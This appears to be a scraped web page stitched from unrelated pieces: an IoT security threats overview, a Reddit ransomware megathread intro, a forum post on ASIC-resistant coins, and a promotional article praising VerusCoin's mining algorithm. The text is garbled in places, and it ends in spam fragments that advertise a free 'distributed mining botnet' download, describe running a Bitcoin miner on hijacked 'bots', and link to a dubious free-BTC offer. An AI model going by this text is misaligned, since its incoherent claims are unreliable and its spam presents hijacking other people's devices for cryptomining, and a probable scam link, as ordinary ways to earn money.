The attackers sent no more than 10 messages from each device, which makes it very difficult to block or determine the location of the incident. This first attack was not far from the last. IoT spam attacks continued in the fall with the Linux.ProxyM IoT botnet.
APTs In recent years, advanced persistent threats (APTs) have become a serious concern for security professionals.
APTs are carried out by funded and widespread attackers such as nation states or corporations that launch complex cyberattacks that are difficult to prevent or mitigate. For example, the Stuxnet worm, which destroyed Iranian nuclear centrifuges and hacking Sony Pictures 2014, was attributed to nation states. Because the critical infrastructure is connected to the Internet, many experts warn that APTs may launch a power-oriented IoT attack, industrial control systems, or other systems connected to the Internet. Some even warn that terrorists could launch an attack on iOT, which could harm the global economy.
Ransomware Ransomware has become too common on home PCs and corporate networks. Now experts say that it is only a matter of time before the attackers begin to block smart devices. Security researchers have already demonstrated the ability to install ransomware on smart thermostats. For example, they can raise the temperature to 95 degrees and refuse to return it to its normal state until the owner agrees to pay a ransom in Bitcoins. They can also launch similar attacks on garage doors, vehicles, or even appliances. How much would you pay to unlock your smart coffee pot first thing in the morning?
Data theft Obtaining important data, such as customer names, credit card numbers, social security numbers, and other personal information, is still one of the main goals of cyber attacks.
IoT devices represent a whole new vector of attack for criminals looking for ways to invade corporate or home networks. For example, if an improperly configured device or IoT sensor is connected to corporate networks, this can give attackers a new way to enter the network and potentially find the valuable data that they need.
Home theft As smart locks and smart garage doors become more commonplace, it is also more likely that cybercriminals can become real thieves.
Home systems that are not properly protected can be vulnerable to criminals with sophisticated tools and software. Security researchers are unlikely to have shown that itís quite easy to break into a house through smart locks from several different manufacturers, and smart garage doors do not seem to be much safer.
Communication with children One of the most disturbing IoT security stories came from children.
One couple discovered that the stranger not only used his monitor for children to spy on their three-year-old son, this stranger also spoke with his child through the device. Mother heard an unknown voice: ìWake up, boy, dad is looking for you,î and the child said that he was scared because at night someone was talking to him on an electronic device. As more and more children’s gadgets and toys connect to the Internet, it seems likely that these frightening scenarios may become more common.
Remote control of a vehicle As vehicles become smarter and more accessible on the Internet, they also become vulnerable to attack.
Hackers have shown that they can take control of a jeep, maximize air conditioning, change the radio station, start the wipers, and ultimately slow down the car. The news led to the recall of 1.4 million cars, but whitehat researchers, following the original exploit, said they discovered additional vulnerabilities that were not fixed by the Chrysler patch applied to the recalled cars. Although experts say the automotive industry is doing a great job of ensuring vehicle safety, it is almost certain that attackers will find new vulnerabilities in such smart cars.
Personal attacks Sometimes IoT covers more than just devices – it can also include people who have connected medical devices implanted in their bodies.
An episode of the television series Homeland attempted a murder aimed at an implanted medical device, and former vice president Dick Cheney was so worried about this scenario that he turned off the wireless capabilities on his implanted defibrillator. This kind of attack has not yet happened in real life, but it remains possible, as many medical devices become part of the IoT.
Hi folks, In light of the ongoing world-wide cyberattack/ransomware issue at the moment, we have decided to set up a mega-thread to contain all of the news and updates as things unfold. If you find new news or stories about the attacks, please do not submit them to the sub, please submit them here and I will periodically add the new links to a growing list. Pre-existing posts will remain but all new posts will be removed and directed here. Thank you to everyone who has posted and help spread the news so far! EDIT: You can download the standalone update here directly from Microsoft. SEE ALSO: /PCMasterRace discussion (Sorted by newest first) (Updated May 15th 4PM (-8gmt))
PreEdit: Im not going to lie, I forgot this subreddit existed, So if you see this as a repeat as the post in Bitcoin then you are correct and im an idiot. ---- Ill admit right now, Im mostly in the dark in this, and I am also one of the miners who purchases ASIC machines. Ive been told by a couple friends that certain coins are changing their algorithms to become ASIC resistant. I was wondering what people are thinking about this because doesnt this just hurt both the ASIC comunity but also the GPU one aswell. As it forces people to purchase GPU's instead to stay mining coins they want. I know I would rather spend my money on a single ASIC then 5 Gpu's. What are peoples thoughts?
Miners have always had it rough.. "Frustrated Miners" The Problem with PoW (and what is being done to solve it) Proof of Work (PoW) is one of the most commonly used consensus mechanisms entrusted to secure and validate many of today’s most successful cryptocurrencies, Bitcoin being one. Battle-hardened and having weathered the test of time, Bitcoin has demonstrated the undeniable strength and reliability of the PoW consensus model through sheer market saturation, and of course, its persistency. In addition to the cost of powerful computing hardware, miners prove that they are benefiting the network by expending energy in the form of electricity, by solving and hashing away complex math problems on their computers, utilizing any suitable tools that they have at their disposal. The mathematics involved in securing proof of work revolve around unique algorithms, each with their own benefits and vulnerabilities, and can require different software/hardware to mine depending on the coin. Because each block has a unique and entirely random hash, or “puzzle” to solve, the “work” has to be performed for each block individually and the difficulty of the problem can be increased as the speed at which blocks are solved increases. Hashrates and Hardware Types While proof of work is an effective means of securing a blockchain, it inherently promotes competition amongst miners seeking higher and higher hashrates due to the rewards earned by the node who wins the right to add the next block. In turn, these higher hash rates benefit the blockchain, providing better security when it’s a result of a well distributed/decentralized network of miners. When Bitcoin first launched its genesis block, it was mined exclusively by CPUs. Over the years, various programmers and developers have devised newer, faster, and more energy efficient ways to generate higher hashrates; some by perfecting the software end of things, and others, when the incentives are great enough, create expensive specialized hardware such as ASICs (application-specific integrated circuit). With the express purpose of extracting every last bit of hashing power, efficiency being paramount, ASICs are stripped down, bare minimum, hardware representations of a specific coin’s algorithm. This gives ASICS a massive advantage in terms of raw hashing power and also in terms of energy consumption against CPUs/GPUs, but with significant drawbacks of being very expensive to design/manufacture, translating to a high economic barrier for the casual miner. Due to the fact that they are virtual hardware representations of a single targeted algorithm, this means that if a project decides to fork and change algorithms suddenly, your powerful brand-new ASIC becomes a very expensive paperweight. The high costs in developing and manufacturing ASICs and the associated risks involved, make them unfit for mass adoption at this time. Somewhere on the high end, in the vast hashrate expanse created between GPU and ASIC, sits the FPGA (field programmable gate array). FPGAs are basically ASICs that make some compromises with efficiency in order to have more flexibility, namely they are reprogrammable and often used in the “field” to test an algorithm before implementing it in an ASIC. As a precursor to the ASIC, FPGAs are somewhat similar to GPUs in their flexibility, but require advanced programming skills and, like ASICs, are expensive and still fairly uncommon. 2 Guys 1 ASIC One of the issues with proof of work incentivizing the pursuit of higher hashrates is in how the network calculates block reward coinbase payouts and rewards miners based on the work that they have submitted. If a coin generated, say a block a minute, and this is a constant, then what happens if more miners jump on a network and do more work? The network cannot pay out more than 1 block reward per 1 minute, and so a difficulty mechanism is used to maintain balance. The difficulty will scale up and down in response to the overall nethash, so if many miners join the network, or extremely high hashing devices such as ASICs or FPGAs jump on, the network will respond accordingly, using the difficulty mechanism to make the problems harder, effectively giving an edge to hardware that can solve them faster, balancing the network. This not only maintains the block a minute reward but it has the added side-effect of energy requirements that scale up with network adoption. Imagine, for example, if one miner gets on a network all alone with a CPU doing 50 MH/s and is getting all 100 coins that can possibly be paid out in a day. Then, if another miner jumps on the network with the same CPU, each miner would receive 50 coins in a day instead of 100 since they are splitting the required work evenly, despite the fact that the net electrical output has doubled along with the work. Electricity costs miner’s money and is a factor in driving up coin price along with adoption, and since more people are now mining, the coin is less centralized. Now let’s say a large corporation has found it profitable to manufacture an ASIC for this coin, knowing they will make their money back mining it or selling the units to professionals. They join the network doing 900 MH/s and will be pulling in 90 coins a day, while the two guys with their CPUs each get 5 now. Those two guys aren’t very happy, but the corporation is. Not only does this negatively affect the miners, it compromises the security of the entire network by centralizing the coin supply and hashrate, opening the doors to double spends and 51% attacks from potential malicious actors. Uncertainty of motives and questionable validity in a distributed ledger do not mix. When technology advances in a field, it is usually applauded and welcomed with open arms, but in the world of crypto things can work quite differently. One of the glaring flaws in the current model and the advent of specialized hardware is that it’s never ending. Suppose the two men from the rather extreme example above took out a loan to get themselves that ASIC they heard about that can get them 90 coins a day? When they join the other ASIC on the network, the difficulty adjusts to keep daily payouts consistent at 100, and they will each receive only 33 coins instead of 90 since the reward is now being split three ways. Now what happens if a better ASIC is released by that corporation? Hopefully, those two guys were able to pay off their loans and sell their old ASICs before they became obsolete. This system, as it stands now, only perpetuates a never ending hashrate arms race in which the weapons of choice are usually a combination of efficiency, economics, profitability and in some cases control. Implications of Centralization This brings us to another big concern with expensive specialized hardware: the risk of centralization. Because they are so expensive and inaccessible to the casual miner, ASICs and FPGAs predominantly remain limited to a select few. Centralization occurs when one small group or a single entity controls the vast majority hash power and, as a result, coin supply and is able to exert its influence to manipulate the market or in some cases, the network itself (usually the case of dishonest nodes or bad actors). This is entirely antithetical of what cryptocurrency was born of, and since its inception many concerted efforts have been made to avoid centralization at all costs. An entity in control of a centralized coin would have the power to manipulate the price, and having a centralized hashrate would enable them to affect network usability, reliability, and even perform double spends leading to the demise of a coin, among other things. The world of crypto is a strange new place, with rapidly growing advancements across many fields, economies, and boarders, leaving plenty of room for improvement; while it may feel like a never-ending game of catch up, there are many talented developers and programmers working around the clock to bring us all more sustainable solutions. The Rise of FPGAs With the recent implementation of the commonly used coding language C++, and due to their overall flexibility, FPGAs are becoming somewhat more common, especially in larger farms and in industrial setting; but they still remain primarily out of the hands of most mining enthusiasts and almost unheard of to the average hobby miner. Things appear to be changing though, one example of which I’ll discuss below, and it is thought by some, that soon we will see a day when mining with a CPU or GPU just won’t cut it any longer, and the market will be dominated by FPGAs and specialized ASICs, bringing with them efficiency gains for proof of work, while also carelessly leading us all towards the next round of spending. A perfect real-world example of the effect specialized hardware has had on the crypto-community was recently discovered involving a fairly new project called VerusCoin and a fairly new, relatively more economically accessible FPGA. The FPGA is designed to target specific alt-coins whose algo’s do not require RAM overhead. It was discovered the company had released a new algorithm, kept secret from the public, which could effectively mine Verus at 20x the speed of GPUs, which were the next fastest hardware types mining on the Verus network. Unfortunately this was done with a deliberately secret approach, calling the Verus algorithm “Algo1” and encouraging owners of the FPGA to never speak of the algorithm in public channels, admonishing a user when they did let the cat out of the bag. The problem with this business model is that it is parasitic in nature. In an ecosystem where advancements can benefit the entire crypto community, this sort of secret mining approach also does not support the philosophies set forth by the Bitcoin or subsequent open source and decentralization movements. Although this was not done in the spirit of open source, it does hint to an important step in hardware innovation where we could see more efficient specialized systems within reach of the casual miner. The FPGA requires unique sets of data called a bitstream in order to be able to recognize each individual coin’s algorithm and mine them. Because it’s reprogrammable, with the support of a strong development team creating such bitstreams, the miner doesn’t end up with a brick if an algorithm changes. All is not lost thanks to.. um.. Technology? Shortly after discovering FPGAs on the network, the Verus developers quickly designed, tested, and implemented a new, much more complex and improved algorithm via a fork that enabled Verus to transition smoothly from VerusHash 1.0 to VerusHash 2.0 at block 310,000. Since the fork, VerusHash 2.0 has demonstrated doing exactly what it was designed for- equalizing hardware performance relative to the device being used while enabling CPUs (the most widely available “ASICs”) to mine side by side with GPUs, at a profit and it appears this will also apply to other specialized hardware. This is something no other project has been able to do until now. Rather than pursue the folly of so many other projects before it- attempting to be “ASIC proof”, Verus effectively achieved and presents to the world an entirely new model of “hardware homogeny”. As the late, great, Bruce Lee once said- “Don’t get set into one form, adapt it and build your own, and let it grow, be like water.” In the design of VerusHash 2.0, Verus has shown it doesn’t resist progress like so many other new algorithms try to do, it embraces change and adapts to it in the way that water becomes whatever vessel it inhabits. This new approach- an industry first- could very well become an industry standard and in doing so, would usher in a new age for proof of work based coins. VerusHash 2.0 has the potential to correct the single largest design flaw in the proof of work consensus mechanism- the ever expanding monetary and energy requirements that have plagued PoW based projects since the inception of the consensus mechanism. Verus also solves another major issue of coin and net hash centralization by enabling legitimate CPU mining, offering greater coin and hashrate distribution. Digging a bit deeper it turns out the Verus development team are no rookies. The lead developer Michael F Toutonghi has spent decades in the field programming and is a former Vice President and Technical Fellow at Microsoft, recognized founder and architect of Microsoft's .Net platform, ex-Technical Fellow of Microsoft's advertising platform, ex-CTO, Parallels Corporation, and an experienced distributed computing and machine learning architect. The project he helped create employs and makes use of a diverse myriad of technologies and security features to form one of the most advanced and secure cryptocurrency to date. A brief description of what makes VerusCoin special quoted from a community member- "Verus has a unique and new consensus algorithm called Proof of Power which is a 50% PoW/50% PoS algorithm that solves theoretical weaknesses in other PoS systems (Nothing at Stake problem for example) and is provably immune to 51% hash attacks. With this, Verus uses the new hash algorithm, VerusHash 2.0. VerusHash 2.0 is designed to better equalize mining across all hardware platforms, while favoring the latest CPUs over older types, which is also one defense against the centralizing potential of botnets. Unlike past efforts to equalize hardware hash-rates across different hardware types, VerusHash 2.0 explicitly enables CPUs to gain even more power relative to GPUs and FPGAs, enabling the most decentralizing hardware, CPUs (due to their virtually complete market penetration), to stay relevant as miners for the indefinite future. As for anonymity, Verus is not a "forced private", allowing for both transparent and shielded (private) transactions...and private messages as well" If other projects can learn from this and adopt a similar approach or continue to innovate with new ideas, it could mean an end to all the doom and gloom predictions that CPU and GPU mining are dead, offering a much needed reprieve and an alternative to miners who have been faced with the difficult decision of either pulling the plug and shutting down shop or breaking down their rigs to sell off parts and buy new, more expensive hardware…and in so doing present an overall unprecedented level of decentralization not yet seen in cryptocurrency. Technological advancements led us to the world of secure digital currencies and the progress being made with hardware efficiencies is indisputably beneficial to us all. ASICs and FPGAs aren’t inherently bad, and there are ways in which they could be made more affordable and available for mass distribution. More than anything, it is important that we work together as communities to find solutions that can benefit us all for the long term. In an ever changing world where it may be easy to lose sight of the real accomplishments that brought us to this point one thing is certain, cryptocurrency is here to stay and the projects that are doing something to solve the current problems in the proof of work consensus mechanism will be the ones that lead us toward our collective vision of a better world- not just for the world of crypto but for each and every one of us.
Download Bitcoin trading bot for free. Bitcoin TA trading and backtesting platform that connects to popular Bitcoin exchanges. Arten von Trading Bots. Bitcoin Arbitrage Bots: Diese Computer Bots sind auf den Handel zwischen mehreren Börsen spezialisiert.; Bitcoin Trading Bots als Cloud Anbieter: Dies sind die besten Programme und für das Bitcoin Bot Trading nach vorgefertigten Handelsstrategien und Algorithmen.; Open Source Trading Bots: Diese Computerprogramme sind quelloffen und damit kostenlos. Bitcoin-Mining-Botnetz um 500.000 Bots erleichtert Symantec hat einen Teil des Peer-to-Peer-Botnetzes ZeroAccess ausgehoben, dabei half eine Software-Schwachstelle. Download distributed mining botnet for free. cryptocurrency distributed mining botnet. cryptocurrency distributed mining botnet Botnet Commands Sent Via Messages Hidden In Bitcoin Blockchain Transactions. After malware utilizes its botnet to carry out an attack, once successful, the botnet can be rerouted to perform other tasks. These are typically more attacks, albeit on different servers with a unique domain or IP coordinates.
Botnet mines Bitcoins -- SatoshiDice Sold -- Primecoin?
Cryptocurrency can be a high-risk, high-reward game for those willing to deal with the volatility. Can we use AI to help us make predictions about Bitcoin's ... This botnet doesn't get flagged as malware, blocked by web filters, or get taken over. This is the stuff of nightmares! While riding on the fluffy Kumobot (kumo means cloud in Japanese), it was ... Subscribe to my bitcoin channel - https://calcur.tech/subscribe-curryncy Updated video - https://www.youtube.com/watch?v=n5Q-A5BVw98 Join Coinbase and earn $... I will be briefly showing how to make money off your bots, for this tutorial I moved a few hundred spare bots I had lying around and Ran a Bitcoin miner on t... Link: http://bit.ly/2vWzttT Best free Bitcoin mining earn up to 0.025 BTC every day Automated miner boost miner is an reliable Bitcoin mining pool. All...